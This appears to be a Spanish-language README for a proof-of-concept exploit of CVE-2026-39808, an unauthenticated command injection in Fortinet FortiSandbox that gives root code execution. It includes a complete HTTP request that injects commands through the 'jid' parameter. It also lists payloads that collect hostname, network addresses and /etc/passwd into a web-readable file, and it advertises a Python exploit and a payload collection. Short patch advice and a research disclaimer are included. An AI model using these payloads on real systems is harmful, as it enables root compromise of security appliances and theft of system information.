
CVE-2026-39808
Este repositorio contiene un Proof of Concept limpio y bien documentado para CVE-2026-39808 — una vulnerabilidad crítica de inyección de comandos sin autenticación en Fortinet FortiSandbox que permite el escape de sandbox y la ejecución remota de código como root (uid=0).
jid
Explotación exitosa mostrando uid=0 gid=0 groups=0
| Rango de Versiones | Estado |
|---|---|
| FortiSandbox 4.4.0 – 4.4.8 | Vulnerable |
| FortiSandbox 5.0.0 – 5.0.5 | Vulnerable |
| 4.4.9+ / 5.0.6+ | Parcheada |
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip
Abrir en el navegador:
https://your-lab-ip/ng/out.txt
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|
# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|
poc.py → Exploit automatizado en Pythonburp-request.txt → Petición de Burp Suite lista para usarpayloads.md → Colección de payloads útilesscreenshots/ → Imágenes de explotación paso a pasoREADME.md → Este archivoActualiza FortiSandbox de inmediato a una de las siguientes versiones:
Fortinet ha publicado parches oficiales que solucionan esta vulnerabilidad.
Hecho con fines de investigación y aprendizaje
⭐ ¡Dale una estrella a este repositorio si te ayudó!